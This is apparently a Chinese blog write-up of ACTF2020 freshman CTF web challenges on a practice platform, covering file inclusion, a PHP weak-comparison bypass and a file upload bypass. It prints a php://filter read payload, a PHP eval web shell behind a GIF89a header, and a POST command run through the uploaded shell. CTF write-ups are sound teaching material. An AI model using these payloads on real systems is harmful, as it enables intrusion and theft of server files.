友情提示:本文最后更新于 470 天前,文中的内容可能已有所发展或发生改变。 [ACTF2020 新生赛]Exec 一个非常简单的命令执行
[ACTF2020 新生赛]Include 随便怎么打都通,vps远程包含,filter协议等等
1
?file=php://filter/convert.base64-encode/resource=flag.php
[ACTF2020 新生赛]BackupFile 题目提示直接访问/index.php.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<? php
include_once "flag.php" ;
if ( isset ( $_GET [ 'key' ])) {
$key = $_GET [ 'key' ];
if ( ! is_numeric ( $key )) {
exit ( "Just num!" );
}
$key = intval ( $key );
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3" ;
if ( $key == $str ) {
echo $flag ;
}
}
else {
echo "Try to find out source file!" ;
}
弱比较很好绕过
[ACTF2020 新生赛]Upload 上传phtml即可
1
2
GIF89a
< script language = 'php' > @ eval ( $_POST [ 'a' ]);</ script >
但是上传之后,又不行后缀被改了,看一下源码,把前端函数删了再来
1
< form enctype = "multipart/form-data" method = "post" onsubmit = "return checkFile()" >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function checkFile () {
var file = document . getElementsByName ( 'upload_file' )[ 0 ] . value ;
if ( file == null || file == "" ) {
alert ( "请选择要上传的文件!" );
return false ;
}
// 定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif" ;
// 提取上传文件的类型
var ext_name = file . substring ( file . lastIndexOf ( "." ));
// 判断上传文件类型是否允许上传
if ( allow_ext . indexOf ( ext_name ) == - 1 ) {
var errMsg = "该文件不允许上传,请上传jpg、png、gif结尾的图片噢!" ;
alert ( errMsg );
return false ;
}
}
都说要删除前端,但是我没有遇到这种情况,我只遇到这种情况就是上传phtml后缀变成了html,然后我就刷了两三次靶机,终于上传成功
1
2
3
4
http://5f8c9914-8682-41c5-83f5-f965ac9924be.node5.buuoj.cn:81/uplo4d/2bbe77e4124ea49444bcd94bfd811898.phtml
POST:
a=system("tac /f*");